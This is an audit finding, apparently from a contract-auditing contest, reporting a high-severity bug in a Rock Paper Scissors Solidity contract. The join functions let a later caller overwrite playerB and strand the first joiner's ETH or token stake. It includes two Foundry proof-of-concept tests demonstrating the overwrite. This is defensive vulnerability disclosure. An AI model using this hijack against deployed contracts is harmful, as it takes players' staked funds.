Rock Paper Scissors
First Flight #38
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

PlayerB Address Can Be Overwritten in joinGameWithEth and joinGameWithToken Functions

vito

Summary

The RockPaperScissors game contract contains a critical security vulnerability in both the joinGameWithEth() and joinGameWithToken() functions. Neither function validates whether game.playerB has already been set, allowing multiple players to join the same game and overwrite the previous playerB value. This results in the original joining player losing their staked ETH or tokens without any possibility of playing the game or recovering their funds.

Vulnerability Details

Both functions for joining games only check that the game is in the "Created" state, but fail to validate whether another player has already joined the game as playerB. When a player joins a game, they commit their stake (either ETH or tokens), but if another player calls the same function afterward, they will overwrite the playerB address value without any validation.
The original playerB loses access to the game and their stake remains locked in the contract with no mechanism to recover it, while the latest player to call the function becomes the new playerB.

Proof of Concept:

function testJoinGameWithTokenOverridesOriginalPlayerB() public {
// First create address for bob (attacker) and fund bob
address bob = makeAddr("bob");
vm.prank(address(game));
token.mint(bob, 10);
vm.startPrank(playerA);
token.approve(address(game), 1);
gameId = game.createGameWithToken(TOTAL_TURNS, TIMEOUT);
vm.stopPrank();
vm.startPrank(playerB);
token.approve(address(game), 1);
game.joinGameWithToken(gameId);
vm.stopPrank();
// Now bob joins the game with token overriding playerB
vm.startPrank(bob);
token.approve(address(game), 1);
game.joinGameWithToken(gameId);
vm.stopPrank();
// Verify bob's attack on playerB succeeded
(, address storedPlayerB,,,,,,,,,,,,,, ) =
game.games(gameId);
assertEq(storedPlayerB, bob);
}
function testJoinGameWithEthOverridesOriginalPlayerB() public {
// First create address for bob and fund bob
address bob = makeAddr("bob");
vm.deal(bob, 10 ether);
uint amount = 1 ether;
vm.startPrank(playerA);
token.approve(address(game), 1);
gameId = game.createGameWithEth{value: amount}(TOTAL_TURNS, TIMEOUT);
vm.stopPrank();
vm.startPrank(playerB);
game.joinGameWithEth{value:amount}(gameId);
vm.stopPrank();
// Now bob joins the game with token overriding playerB
vm.startPrank(bob);
game.joinGameWithEth{value: amount}(gameId);
vm.stopPrank();
// Verify bob's attack on playerB succeeded
(, address storedPlayerB,,,,,,,,,,,,,, ) =
game.games(gameId);
assertEq(storedPlayerB, bob);
}

Impact

The impact of this vulnerability is High due to loss of funds and ease of execution:

  • Any player who joins a game can have their position locked forever by another player.

  • This vulnerability can be exploited repeatedly on the same game, causing multiple players to lose their stakes.

  • This fundamentally breaks the game and creates a significant financial risk for any participant.

  • The vulnerability can be weaponized by malicious users to undermine the whole system to become not viable anymore.

Tools Used

  • Foundry

Recommendations

  • Add a validation check in both functions to ensure playerB has not already been set.

Updates

Appeal created

m3dython Lead Judge 2 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Absence of State Change on Join Allows Player B Hijacking

Game state remains Created after a player joins

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.